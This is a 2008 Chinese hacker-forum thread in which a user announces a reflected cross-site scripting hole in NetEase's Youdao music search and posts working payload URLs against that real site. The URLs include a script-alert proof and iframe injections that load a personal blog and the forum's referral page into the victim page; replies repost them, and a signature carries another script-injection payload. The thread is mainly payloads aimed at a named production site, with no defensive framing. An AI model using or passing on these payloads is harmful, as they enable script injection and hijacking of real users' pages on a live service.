‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[原创] 网易搜索!!! XSS跨的就是你!!!

背时鬼

"></script><&

三年级

Rank: 3Rank: 3Rank: 3

帖子
736 
精华
1 
威望
279 度 
金币
1509 枚 
来自
云南省昆明市中心 
最后登录
2008-12-2 
1# 发表于 2008-9-22 00:26  只看该作者

网易搜索!!! XSS跨的就是你!!!

管理员XIAOYY发了X论坛的XSS,贴子人气,居然盖过了,我发的盛大XSS.5555555,终于天无绝人之路.历经1.5个小时.我发现了下面页面的问题.
双手奉上我的成果网易搜索XSS.希望大家能回个贴.谢谢,
XSS测试代码:
http://mp3.youdao.com/search?keyfrom=music.top&q=X&btnSearchTop=%E6%90%9C+%E7%B4%A2&t=ALL">%3Cscript%3Ealert('XSS')%3C/script%3E%20<"

请复制完再回车.

框架代码(大家帮忙点下):
http://mp3.youdao.com/search?keyfrom=music.top&q=X&btnSearchTop=%E6%90%9C+%E7%B4%A2&t=ALL"><iframe%20src=http://hh312623376.blog.163.com/%20width=900%20height=1200></iframe><"
美眉的BLOG
本帖最近评分记录
[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

bk7477890

XIAOYY

正式版主

Rank: 9Rank: 9Rank: 9

黑客X档案官方论坛

帖子
4542 
精华
1 
威望
106 度 
金币
9712 枚 
性别
男 
来自
西安 
最后登录
2008-12-2 
2# 发表于 2008-9-22 00:30  只看该作者
复制内容到剪贴板
代码:
http://mp3.youdao.com/search?keyfrom=music.top&q=X&btnSearchTop=%E6%90%9C+%E7%B4%A2&t=ALL"><iframe%20src=http://bbs.hackerxfiles.net/?fromuid=5348/%20width=900%20height=1200></iframe><"

TOP

laker_080

学前班

帖子
23 
精华
0 
威望
0 度 
金币
52 枚 
最后登录
2008-11-12 
3# 发表于 2008-9-22 11:57  只看该作者
http://mp3.youdao.com/search?key ... %E7%B4%A2&t=ALL">%3Cscript%3Ealert('XSS')%3C/script%3E%20<"

TOP

背时鬼

"></script><&

三年级

Rank: 3Rank: 3Rank: 3

帖子
736 
精华
1 
威望
279 度 
金币
1509 枚 
来自
云南省昆明市中心 
最后登录
2008-12-2 
4# 发表于 2008-9-22 17:23  只看该作者
http://mp3.youdao.com/search?key ... %E7%B4%A2&t=ALL">%3Cscript%3Ealert('XSS')%3C/script%3E%20<"%20
[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题

Processed in 0.021660 second(s), 6 queries, Gzip enabled